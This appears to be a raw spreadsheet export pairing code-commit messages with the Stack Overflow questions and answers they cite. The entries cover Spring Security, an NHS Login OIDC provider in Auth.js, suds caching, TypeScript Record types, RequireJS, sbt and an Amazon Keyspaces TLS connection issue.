	// "customizations": {},
	// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
	"remoteUser": "root"
	"remoteUser": "root",
	"customizations": {
		"vscode": {
			"extensions": [
				"vmware.vscode-boot-dev-pack",
				"vscjava.vscode-gradle",
				"vscjava.vscode-java-pack"
			]
		}
	}
}
0 commit comments
Comments
0
 (0)
Comment
You're not receiving notifications from this thread.
</t>
  </si>
  <si>
    <t>You can use authorizeHttpRequests instead of authorizeRequests and requestMatchers instead of antMatchers.
For example:
http.authorizeHttpRequests()
  .requestMatchers("/authentication/**").permitAll()
  .requestMatchers("/h2/**").permitAll()
  .anyRequest().authenticated();</t>
  </si>
  <si>
    <t xml:space="preserve">I am designing this database that must maintain a history of employee salary and the movements within the organization. Basically, my design has 3 tables (I mean, there more tables but for this question I'll mention 3, so bear with me). Employee table (containing the most current salary, position data, etc), SalaryHistory table (salary, date, reason, etc.) and MovementHistory(Title, Dept., comments). I'll be using Linq to Sql, so what I was thinking is that every time employee data is updated, the old values will be copied to their respective history tables. Is this a good approach? Should I just do it using Linq to SQL or triggers? Thanks for any help, suggestion or idea.
</t>
  </si>
  <si>
    <t>C767</t>
  </si>
  <si>
    <t>Allow access to services using an Authorization header for api clients
The default mechanism to check for user credentials is using a session
cookie. If a user is logged in, the cookie is being checked. However,
the system should also allow access if a proper JWT token is provided
in the Authorization header. This is apparently non-trivial. See
https://stackoverflow.com/questions/34718586/spring-security-oauth2-enableoauth2sso-but-accept-tokens-as-authentication-t</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm implementing NHS Login (OpenID Connect) with Next.js 14, Auth.js (NextAuth), and tRPC in a T3 Turbo repo. The authentication flow fails with a CallbackRouteError, and the callbacks aren't firing despite adding logging.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Authentication Flow:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;User clicks &amp;quot;Sign up with NHS&amp;quot; on signup page&lt;/li&gt;
&lt;li&gt;Redirects to NHS Login&lt;/li&gt;
&lt;li&gt;After NHS authentication, redirects back to our app&lt;/li&gt;
&lt;li&gt;Gets CallbackRouteError on &lt;code&gt;/api/auth/callback/nhs&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Environment:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Next.js 14&lt;/li&gt;
&lt;li&gt;Auth.js (NextAuth)&lt;/li&gt;
&lt;li&gt;tRPC&lt;/li&gt;
&lt;li&gt;T3 Turbo repo&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Custom NHS Provider Implementation:&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;
    import { createPrivateKey } from &amp;quot;crypto&amp;quot;
    import type { OIDCConfig } from &amp;quot;next-auth/providers&amp;quot;
    import { SignJWT } from &amp;quot;jose&amp;quot;
    interface NHSPROFILE {
      sub: string
      family_name: string
      email: string
      nhs_number: string
      identity_proofing_level: string
    }
    export const NhsProvider = ({
      clientId,
      clientSecret,
      issuer,
      privateKey,
      redirectUri,
    }: {
      clientId: string
      clientSecret: string
      issuer?: string
      privateKey: string
      redirectUri: string
    }): OIDCConfig&amp;lt;NHSPROFILE&amp;gt; =&amp;gt; ({
      id: &amp;quot;nhs&amp;quot;,
      name: &amp;quot;NHS Login&amp;quot;,
      type: &amp;quot;oidc&amp;quot;,
      issuer,
      wellKnown: `${issuer}/.well-known/openid-configuration`,
      authorization: {
        params: {
          scope: &amp;quot;openid profile email&amp;quot;,
          vtr: '[&amp;quot;P9.Cp.Cd&amp;quot;]',
          response_type: &amp;quot;code&amp;quot;,
          redirect_uri: redirectUri,
        },
      },
      clientId,
      clientSecret,
      token: {
        async request(context) {
          console.log(&amp;quot;Token request context:&amp;quot;, context)
          const now = Math.floor(Date.now() / 1000)
          const key = createPrivateKey(privateKey)
          // Get token endpoint from well-known configuration
          const response = await fetch(`${issuer}/.well-known/openid-configuration`)
          const config = await response.json() as { token_endpoint: string }
          const tokenEndpoint = config.token_endpoint
          // Create client assertion
          const assertion = await new SignJWT({
            sub: clientId,
            iss: clientId,
            aud: tokenEndpoint,
            jti: crypto.randomUUID(),
            exp: now + 300,
            iat: now,
          })
            .setProtectedHeader({ alg: &amp;quot;RS512&amp;quot;, typ: &amp;quot;JWT&amp;quot; })
            .sign(key)
          const params = new URLSearchParams({
            grant_type: &amp;quot;authorization_code&amp;quot;,
            code: context.params.code,
            redirect_uri: context.provider.callbackUrl,
            client_id: clientId,
            client_assertion_type: &amp;quot;urn:ietf:params:oauth:client-assertion-type:jwt-bearer&amp;quot;,
            client_assertion: assertion,
            code_verifier: context.codeVerifier,
          })
          const result = await fetch(tokenEndpoint, {
            method: &amp;quot;POST&amp;quot;,
            headers: {
              &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot;,
              Accept: &amp;quot;application/json&amp;quot;,
            },
            body: params,
          })
          return await result.json()
        },
      },
      userinfo: {
        async request(context) {
          console.log(&amp;quot;Userinfo request context:&amp;quot;, context)
          const response = await fetch(`${issuer}/.well-known/openid-configuration`)
          const config = await response.json() as { userinfo_endpoint: string }
          const userinfoEndpoint = config.userinfo_endpoint
          const result = await fetch(userinfoEndpoint, {
            headers: {
              Authorization: `Bearer ${context.tokens.access_token}`,
              Accept: &amp;quot;application/json&amp;quot;,
            },
          })
          return await result.json()
        },
      },
      profile(profile) {
        console.log(&amp;quot;Profile data:&amp;quot;, profile)
        return {
          id: profile.sub,
          name: profile.family_name,
          email: profile.email,
          nhsNumber: profile.nhs_number,
          identityProofingLevel: profile.identity_proofing_level,
        }
      },
      checks: [&amp;quot;pkce&amp;quot;, &amp;quot;state&amp;quot;],
      client: {
        token_endpoint_auth_method: &amp;quot;private_key_jwt&amp;quot;,
        token_endpoint_auth_signing_alg: &amp;quot;RS512&amp;quot;,
      },
    })
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Auth Configuration:&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;
    providers: [
        NhsProvider({
          clientId: env.NHS_LOGIN_CLIENT_ID,
          clientSecret: env.NHS_LOGIN_CLIENT_SECRET,
          redirectUri: `${&amp;quot;http://localhost:3000&amp;quot;}/api/auth/callback/nhs`,
          issuer: env.NHS_LOGIN_ISSUER,
          privateKey: env.NHS_LOGIN_PRIVATE_KEY,
        }),
    ],
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Sign In Hook:&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;
    export function useNHSLoginMutation() {
      return useMutation({
        mutationFn: async () =&amp;gt; {
          return await signIn(&amp;quot;nhs&amp;quot;, {
            redirectTo: `${window.location.origin}/sign-up`,
          })
        },
        onError: (error) =&amp;gt; {
          if (isRedirectError(error)) {
            throw error
          }
          toast({
            title: &amp;quot;Error signing in. Please try again&amp;quot;,
            variant: &amp;quot;destructive&amp;quot;,
          })
        },
      })
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Error:&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;
    Auth error: {
      message: 'Read more at https://errors.authjs.dev#callbackrouteerror',
      name: 'CallbackRouteError',
      stack: 'CallbackRouteError: Read more at https://errors.authjs.dev#callbackrouteerror\n'
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;What I've Tried:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Added extensive logging in token, userinfo, and profile callbacks&lt;/li&gt;
&lt;li&gt;Verified all environment variables are set correctly&lt;/li&gt;
&lt;li&gt;Confirmed the NHS Login sandbox environment is working&lt;/li&gt;
&lt;li&gt;Checked the callback URL matches exactly in NHS Login configuration&lt;/li&gt;
&lt;li&gt;Verified PKCE and state parameters are being passed correctly&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The callbacks don't seem to be firing at all - none of the console.log statements appear in the logs. The error occurs immediately when hitting the callback URL.&lt;/p&gt;
&lt;p&gt;Any ideas what could be causing this or how to debug further? Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The reason for the exception was the ordering of the filters like
@jah
said.
What i did to achieve the authentication of requests, containing an access token in the Authorization-Header, is to create a class
ApiTokenAccessFilter
which extends
OAuth2AuthenticationProcessingFilter
. This filter takes a
ResourceServerTokenServices
constructor parameter and sets the stateless flag to false.
public class ApiTokenAccessFilter extends OAuth2AuthenticationProcessingFilter {
  public ApiTokenAccessFilter(ResourceServerTokenServices resourceServerTokenServices) {
    super();
    setStateless(false);
    setAuthenticationManager(oauthAuthenticationManager(resourceServerTokenServices));
  }
  private AuthenticationManager oauthAuthenticationManager(ResourceServerTokenServices tokenServices) {
    OAuth2AuthenticationManager oauthAuthenticationManager = new OAuth2AuthenticationManager();
    oauthAuthenticationManager.setResourceId("oauth2-resource");
    oauthAuthenticationManager.setTokenServices(tokenServices);
    oauthAuthenticationManager.setClientDetailsService(null);
    return oauthAuthenticationManager;
  }
}
In my security config i used this Filter as follows:
@Configuration
@EnableOAuth2Sso
public class SecurityConfiguration extends WebSecurityConfigurerAdapter {
  @Autowired
  private ResourceServerTokenServices tokenServices;
  @Override
  public void configure(HttpSecurity http) throws Exception {
    http.authorizeRequests()
        .anyRequest()
        .authenticated()
        .and()
        .addFilterBefore(new ApiTokenAccessFilter(tokenServices), AbstractPreAuthenticatedProcessingFilter.class);
  }
}
I think this could be easier so i opened an issue on the
spring-security-oauth Github repo
. I'm not sure whether this solution is the way to go, but i didn't find another alternative.</t>
  </si>
  <si>
    <t>C768</t>
  </si>
  <si>
    <t>Fixing cache EOFError.  See http://stackoverflow.com/questions/6038226/suds-is-not-reusing-cached-wsdls-and-xsds-although-i-expect-it-to/6794466#6794466</t>
  </si>
  <si>
    <t>The problem is in the suds library itself.  In cache.py, although
ObjectCache.get()
is always getting a valid file pointer, it's hitting an exception (EOFError) doing
pickle.load(fp)
.  When that happens, the file is just downloaded again.
Here's the sequence of events:
DocumentReader.open():
Trying
http://172.28.50.249/wsdl/billingServices/v3.0/RequestScrubAddress.wsdl
Loading ObjectCache 51012453-document
Loading pickled object...
Exception raised:
Got None from cache
Downloading...  Done
Saving FileCache 51012453-document... Done
So it doesn't really matter that the new cache file was saved, because the same thing happens the next time I run.  This happens for ALL of WSDL and XSD files.
I fixed that problem by opening the cache file in binary mode when reading and writing.  Specifically, the changes I made were in cache.py:
1) In
FileCache.put()
, change this line:
f = self.open(fn, 'w')
to
f = self.open(fn, 'wb')
2) In
FileCache.getf()
, change this line:
return self.open(fn)
to
return self.open(fn, 'rb')
I don't know the codebase well enough to know if these changes are safe, but it
is
pulling the objects from the file cache, the service
is still
running successfully, and loading the client went
from 16 seconds down to 2.5 seconds
.  Much better if you ask me.
Hopefully this fix, or something similar can be introduced back into the suds main line.  I've already sent this to the suds mailing list (fedora-suds-list at redhat dot com).</t>
  </si>
  <si>
    <t xml:space="preserve">I am designing a web app that has some information that needs to be transferred to a client side (non-browser) application (i.e. Outlook).  Assuming the client side app has an API of some sort, I need for the web app to trigger the client side (based on a user clicking a link) to get the information and transfer it into the client app through it's API.
My first thought would be to write an ActiveX control that I can pass a secure code to that then uses that information to talk back to the web app through a web service I create and then the ActiveX control can implement the interface into the client side app (i.e. Outlook).  Based on what I have read, this is doable with ActiveX.
My problem is that ActiveX won't work in Mozilla browsers or Chrome which poses a real problem as I need this to be multi-platform.  I've read about NPAPI which is supposedly the equivelent native technology.  I also read about plug-ins for Firefox and Chrome that supposedly support ActiveX, but they aren't native.  I need to have native out of the box support so that users don't have to do anything special, just click and run.  So here are my questions:
1) Is ActiveX my only option for IE?
2) Do I need to develop ActiveX and NPAPI to support all clients?
3) Is there a better way to do this that I am not aware of?  I am open to other technologies since the focus is on a seamless user experience.
Thanks for any insight!
</t>
  </si>
  <si>
    <t>C769</t>
  </si>
  <si>
    <t>Update Utility Types.md
The **reuse** of the page-title names inside the `Record` value's object-literals was very confusing for me, so I'm proposing this alternative based on the explanation on the SO post: https://stackoverflow.com/questions/51936369/what-is-the-record-type-in-typescript</t>
  </si>
  <si>
    <t>Can someone give a simple definition of what
Record
is?
A
Record&lt;K, T&gt;
is an object type whose property keys are
K
and whose property values are
T
.  That is,
keyof Record&lt;K, T&gt;
is equivalent to
K
, and
Record&lt;K, T&gt;[K]
is (basically) equivalent to
T
.
Is
Record&lt;K,T&gt;
merely a way of saying "all properties on this object will have type
T
"? Probably not all objects, since
K
has some purpose...
As you note,
K
has a purpose... to limit the property keys to particular values.  If you want to accept all possible string-valued keys, you could do something like
Record&lt;string, T&gt;
, but the idiomatic way of doing that is to use an
index signature
like
{ [k: string]: T }
.
Does the
K
generic forbid additional keys on the object that are not
K
, or does it allow them and just indicate that their properties are not transformed to
T
?
It doesn't exactly "forbid" additional keys: after all, a value is generally allowed to have properties not explicitly mentioned in its type... but it wouldn't recognize that such properties exist:
declare const x: Record&lt;"a", string&gt;;
x.b; // error, Property 'b' does not exist on type 'Record&lt;"a", string&gt;'
and it would treat them as
excess properties
which are sometimes rejected:
declare function acceptR(x: Record&lt;"a", string&gt;): void;
acceptR({a: "hey", b: "you"}); // error, Object literal may only specify known properties
and sometimes accepted:
const y = {a: "hey", b: "you"};
acceptR(y); // okay
With the given example:
type ThreeStringProps = Record&lt;'prop1' | 'prop2' | 'prop3', string&gt;
Is it exactly the same as this?:
type ThreeStringProps = {prop1: string, prop2: string, prop3: string}
Yes!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've had this issue in a project of mine and I've setup a minimal example reproducing the issue, it took me a while to figure out the problem.&lt;/p&gt;
&lt;p&gt;But it seems that when I set &lt;code&gt;Test / envVars&lt;/code&gt; in my &lt;code&gt;build.sbt&lt;/code&gt; they aren't propagated to tests in a sub project&lt;/p&gt;
&lt;p&gt;This is my &lt;code&gt;build.sbt&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    ThisBuild / scalaVersion := &amp;quot;3.3.1&amp;quot;
    Test / envVars := Map(&amp;quot;TEST&amp;quot; -&amp;gt; &amp;quot;TEST_ENVVARS&amp;quot;)
    Test / fork    := true
    lazy val subProject = project
      .in(file(&amp;quot;sub-project&amp;quot;))
      .settings(
        libraryDependencies ++= Seq(
          &amp;quot;org.scalatest&amp;quot; %% &amp;quot;scalatest&amp;quot; % &amp;quot;3.2.9&amp;quot; % Test
        )
      )
    lazy val root = project
      .in(file(&amp;quot;.&amp;quot;))
      .aggregate(subProject)
      .settings(
        libraryDependencies ++= Seq(
          &amp;quot;org.scalatest&amp;quot; %% &amp;quot;scalatest&amp;quot; % &amp;quot;3.2.9&amp;quot; % Test
        )
      )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have two identical tests, one in the &amp;quot;root&amp;quot; of the project and one in &amp;quot;sub-project&amp;quot; directory
&lt;code&gt;src/test/scala/example/RootExampleTest.scala&lt;/code&gt; and &lt;code&gt;sub-project/src/test/scala/example/SubProjectExampleTest.scala&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;They both look like this with the exception of the class name&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package example
    import org.scalatest.flatspec.AnyFlatSpec
    import scala.util.Properties
    class RootExampleTest extends AnyFlatSpec {
      &amp;quot;RootExampleTest&amp;quot; should &amp;quot;read envVars&amp;quot; in {
        assert(Properties.envOrNone(&amp;quot;TEST&amp;quot;).nonEmpty)
      } 
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when I run the test with &lt;code&gt;sbt test&lt;/code&gt; the &lt;code&gt;SubProjectExampleTest&lt;/code&gt; fails but the &lt;code&gt;RootExampleTest&lt;/code&gt; succeeds.&lt;/p&gt;
&lt;p&gt;I was expecting that the sub-project would also have the envVars propagated&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C77</t>
  </si>
  <si>
    <t>adds main.js
after reading:
1) http://stackoverflow.com/questions/10815454/how-does-requirejs-work-with-multiple-pages-and-partial-views/10816983#10816983
I decided to add a main.js for overall setup and the anki templates will
import modules using the pseudo-setup below:
&lt;script data-main="_main.js" src="_require.js"&gt;&lt;/script&gt;
&lt;script&gt;
  require(["_insert-dfn-tags.js", "_insert-word-links.js"]);
&lt;/script&gt;</t>
  </si>
  <si>
    <t>Update - I've added an example of using RequireJS with modular HTML components. Build tool example included - https://github.com/simonsmith/modular-html-requirejs
I have also written a blog article about this - http://simonsmith.io/modular-html-components-with-requirejs/
The approach of just using main.js for everything is probably more suited to a single page application.
The way I've handled this situation is to only include common site-wide JS in the main.js file:
On every page:
&lt;script src="require.js" data-main="main"&gt;&lt;/script&gt;
main.js
require.config({
// config options
});
require(['jquery', 'common/ajaxLoader', 'common/someOtherModule'], function($, ajax, otherModule) {
    // Modules that do stuff on every page are instantiated here 
});
page1.html
&lt;script&gt;
    require(['scripts/page1']);
&lt;/script&gt;
page1.js
require(['jquery', 'page1Module'], function($, module){
    // page1 specific stuff here
});
The above example is just one of a couple of ways to handle it. Note the difference between loading a plain JavaScript file and a module.
A rule of thumb I follow is to keep all reusable modules (or Classes if it makes it easier to conceptualise) inside a define with their own dependencies etc and then use require to grab those modules, use their methods or interact with them in some way.
Using this pattern will almost certainly require use of the domReady module that is a separate plugin for RequireJS. Use this instead of a ready function in jQuery for example, as it allows modules to begin downloading before the DOM is ready which reduces the wait for your code to execute.
Edit You may wish to see another example of multi-page application in the RequireJS repo</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to connect to Amazon Keyspaces from EC2 Windows instance, and couldn't, BUT I can successfully connect to it from my local PC with absolutely same trivial console application:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using Cassandra;
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;
namespace cassandraconnectiotest;
internal class Program
{
    static void Main(string[] args)
    {
        try
        {
            var amazoncert = new X509Certificate2(&amp;quot;AmazonRootCA1.der&amp;quot;);
            // I obtained AmazonRootCA1.der by executing:
            // curl https://www.amazontrust.com/repository/AmazonRootCA1.pem -o AmazonRootCA1.pem
            // openssl x509 -outform der -in AmazonRootCA1.pem -out AmazonRootCA1.der
            var sslOptions = new SSLOptions(System.Security.Authentication.SslProtocols.Tls13, false, null) //it will NOT work with simple new SSLOptions() for some reason
            // and will return Cassandra.NoHostAvailableException: All hosts tried for query failed (tried 3.12.23.190:9142: IOException 'Unable to read data from the transport connection: An existing connection was forcibly closed by the remote host..')
                .SetCertificateCollection(new X509Certificate2Collection { amazoncert })
                .SetRemoteCertValidationCallback((sender, cert, chain, sslPolicyErrors) =&amp;gt;
                {
                    Console.WriteLine(cert.Subject);
                    if (sslPolicyErrors == SslPolicyErrors.None)
                    {
                        Console.WriteLine($&amp;quot;SSL Certificate is valid!&amp;quot;);
                        return true; // Certificate is valid
                    }
                    else
                    {
                        // Log the SSL policy errors
                        Console.WriteLine($&amp;quot;SSL Certificate Error: {sslPolicyErrors}&amp;quot;);
                        // Optionally, log details about the certificate and chain
                        if ((sslPolicyErrors &amp;amp; SslPolicyErrors.RemoteCertificateChainErrors) != 0 &amp;amp;&amp;amp; chain != null)
                        {
                            foreach (var chainStatus in chain.ChainStatus)
                            {
                                Console.WriteLine($&amp;quot;Chain Status: {chainStatus.Status} - {chainStatus.StatusInformation}&amp;quot;);
                            }
                        }
                        // Return false to reject the certificate
                        return false;
                    }
                });
            var cluster = Cluster.Builder()
                 .AddContactPoints(&amp;quot;cassandra.us-east-2.amazonaws.com&amp;quot;)
                 .WithPort(9142)
                 .WithAuthProvider(new PlainTextAuthProvider(&amp;quot;cassandra_keyspaces+1-at-NNNNhere&amp;quot;, @&amp;quot;xLk35password/2ndpartofit=&amp;quot;))
                 .WithSSL(sslOptions)
                 .Build();
            var session = cluster.Connect();
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.ToString());
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I'm connecting from my local machine, I'm getting number of messages like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CN=cassandra.us-east-2.amazonaws.com
SSL Certificate is valid!
CN=cassandra.us-east-2.amazonaws.com
SSL Certificate is valid!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so I'm assuming it's negotiation phase.&lt;/p&gt;
&lt;p&gt;But when I'm running same app from EC2 instance, I'm getting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Cassandra.NoHostAvailableException: All hosts tried for query failed (tried 3.12.23.188:9142: AuthenticationException 'Authentication failed, see inner exception.')
   at Cassandra.Connections.Control.ControlConnection.Connect(Boolean isInitializing)
   at Cassandra.Connections.Control.ControlConnection.InitAsync()
   at Cassandra.Tasks.TaskHelper.WaitToCompleteAsync(Task task, Int32 timeout)
   at Cassandra.Cluster.Init()
   at Cassandra.Cluster.ConnectAsync(String keyspace)
   at Cassandra.Tasks.TaskHelper.WaitToComplete(Task task, Int32 timeout)
   at Cassandra.Tasks.TaskHelper.WaitToComplete[T](Task`1 task, Int32 timeout)
   at Cassandra.Cluster.Connect(String keyspace)
   at Cassandra.Cluster.Connect()
   at cassandraconnectiotest.Program.Main(String[] args) in D:\git\beholdtech\trivialcassandraconnectiontest\cassandraconnectiotest\Program.cs:line 56
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At the same time on EC2 instance:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tracert cassandra.us-east-2.amazonaws.com
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;gives:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Tracing route to cassandra.us-east-2.amazonaws.com [3.12.23.165]... 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(seems to be working)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:\&amp;gt;nslookup cassandra.us-east-2.amazonaws.com
Server:  ip-172-31-0-2.us-east-2.compute.internal
Address:  172.31.0.2
Non-authoritative answer:
Name:    cassandra.us-east-2.amazonaws.com
Address:  3.12.23.190
telnet cassandra.us-east-2.amazonaws.com 9142
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;gives black screen with some effect when I type.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;c:\&amp;gt; openssl s_client -connect cassandra.us-east-2.amazonaws.com:9142 -msg -debug
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;gives&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Connecting to 3.12.23.184
CONNECTED(00000140)
... dumps... 
subject=CN=cassandra.us-east-2.amazonaws.com
issuer=C=US, O=Amazon, CN=Amazon RSA 2048 M01
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 5565 bytes and written 408 bytes
Verification error: unable to get local issuer certificate
---
New, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256
Protocol: TLSv1.3
Server public key is 2048 bit
This TLS version forbids renegotiation.
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 20 (unable to get local issuer certificate)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;openssl s_client -connect cassandra.us-east-2.amazonaws.com:9142 -CAfile &amp;quot;C:\AmazonRootCA1.der&amp;quot;&lt;/strong&gt;
returns:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;E4130000:error:05800088:x509 certificate routines:X509_load_cert_crl_file_ex:no certificate or crl found:crypto\x509\by_file.c:264:
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I use another certificate, sf-class2-root.crt, or sf-class2-root.cer obtained via:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$client = new-object System.Net.WebClient
$client.DownloadFile(&amp;quot;https://certs.secureserver.net/repository/sf-class2-root.crt&amp;quot;,&amp;quot;d:\sf-class2-root.crt&amp;quot;)                                                                                                            
Export-Certificate -Cert $cert -FilePath &amp;quot;c:\sf-class2-root.cer&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;c:&amp;gt;openssl s_client -connect cassandra.us-east-2.amazonaws.com:9142 -CAfile &amp;quot;C:\NEWTEST\sf-class2-root.crt&amp;quot;&lt;/p&gt;
&lt;p&gt;will give me:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Connecting to 3.12.23.176
CONNECTED(00000140)
depth=4 C=US, O=Starfield Technologies, Inc., OU=Starfield Class 2 Certification Authority
verify return:1
depth=3 C=US, ST=Arizona, L=Scottsdale, O=Starfield Technologies, Inc., CN=Starfield Services Root Certificate Authority - G2
verify return:1
depth=2 C=US, O=Amazon, CN=Amazon Root CA 1
verify return:1
depth=1 C=US, O=Amazon, CN=Amazon RSA 2048 M01
verify return:1
depth=0 CN=cassandra.us-east-2.amazonaws.com
verify return:1
---
Certificate chain
 0 s:CN=cassandra.us-east-2.amazonaws.com
   i:C=US, O=Amazon, CN=Amazon RSA 2048 M01
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Nov  8 00:00:00 2024 GMT; NotAfter: Oct 26 23:59:59 2025 GMT
 1 s:C=US, O=Amazon, CN=Amazon RSA 2048 M01
   i:C=US, O=Amazon, CN=Amazon Root CA 1
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Aug 23 22:21:28 2022 GMT; NotAfter: Aug 23 22:21:28 2030 GMT
 2 s:C=US, O=Amazon, CN=Amazon Root CA 1
   i:C=US, ST=Arizona, L=Scottsdale, O=Starfield Technologies, Inc., CN=Starfield Services Root Certificate Authority - G2
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: May 25 12:00:00 2015 GMT; NotAfter: Dec 31 01:00:00 2037 GMT
 3 s:C=US, ST=Arizona, L=Scottsdale, O=Starfield Technologies, Inc., CN=Starfield Services Root Certificate Authority - G2
   i:C=US, O=Starfield Technologies, Inc., OU=Starfield Class 2 Certification Authority
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Sep  2 00:00:00 2009 GMT; NotAfter: Jun 28 17:39:16 2034 GMT
...
-----END CERTIFICATE-----
subject=CN=cassandra.us-east-2.amazonaws.com
issuer=C=US, O=Amazon, CN=Amazon RSA 2048 M01
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 5565 bytes and written 408 bytes
Verification: OK
---
New, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256
Protocol: TLSv1.3
Server public key is 2048 bit
This TLS version forbids renegotiation.
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 0 (ok)
---
DONE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but starting application with this sf-class2-root.crt will lead to the same result: everything works from localhost and error on EC2 instance.&lt;/p&gt;
&lt;p&gt;Can you please advice, what to do? How to add any logging? what could be the reason? My EC2 instance has static IP and all outbound connections allowed.&lt;/p&gt;
&lt;p&gt;It was supposed to be trivial, very quick, easy task. It took me already DAYS trying to figure out... Is there another way to connect using CassndraCSharpDriver? TRIVIAL, which will just work from any computer, either local or EC2 (I can modify code during deployment as well, adopting behavior to environment).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C770</t>
  </si>
  <si>
    <t>Skip to content
Navigation Menu
15210510669
camunda
Type / to search
Code
Issues
Pull requests
Actions
Projects
Security
Insights
Commit 40a0d43
Preview
Give feedback
ralfpuchertoleksandr-kriuchenko-lohikamihail-cahuygurjohanwelgemoed
authored
on Sep 22, 2023
Verified
feat(backend): Opensearch implementations (#5143)
* feat(backend): introduce conditions for Opensearch/ELasticsearch
* feat(backend): remove profiles for Opensearch/Elasticsearch
* feat(backend): add OpensearchConnector
* feat(backend): add OpensearchSchemaManager and RetryOpensearchClient
* feat(backend): add OpenDecisionStore
* feat(backend): add OpenDecisionStore
* feat(backend): add OpensearchUtil
Related with #5135
* feat(backend): Add OpensearchProperties and further setups
Related with #5135
* feat(backend): Add schema files for Opensearch
Related with #5135
* feat(backend): Add implementation stubs for Opensearch
Related with #5135
* feat(backend): Add implementation for webapp writer
Related with #5135
* feat(backend): introduce RecordsReader interface
Related with #4887
* feat(backend): renamed IncidentPostImportAction
Related with #4887
* feat(backend): move ELS related methods from FlowNodeInstanceZeebeRecordProcessor to FlowNodeStore
Related with #4887
* fix(backend-test): fix import error
Related with #4887
* feat(backend): remove ELS from ListViewZeebeRecordProcessor (importer-8.3)
Related with #4887
* feat(backend): remove ELS from ProcessZeebeRecordProcessor (importer-8.3)
Related with #4887
* feat(backend): remove ELS from ListView and ProcessZeebeRecordProcessor
- remove ElasticsearchQueries
- rename ElasticsearchBulkProcessor to ImportBulkProcessor
Related with #4887
* fix(backend): use Zeebe Record not java...Record
Related with #4887
* fix(backend-test): use OperateZeebeIntegrationTest in ReindexIT
Related with #4887
* feat(backend): Add implementation stubs for web reader Opensearch
Related with #5135
* feat(backend): add database property
Related with #5135
* feat(backend): implement OpensearchUserStore
Related with #5135
* feat(backend): implement OpensearchZeebeStore
Related with #5135
* feat(backend): implement OpensearchZeebeStore
- add stubs for Opensearch Dao's
Related with #5135
* feat(backend): add conditions and stub implementations
Related with #5135
* feat(backend): use port 9200 also for Opensearch
* feat(backend): add OpensearchRecordsReader implementation
Related with #5135
* feat(backend): start OpensearchImportStore implementation
Related with #5135
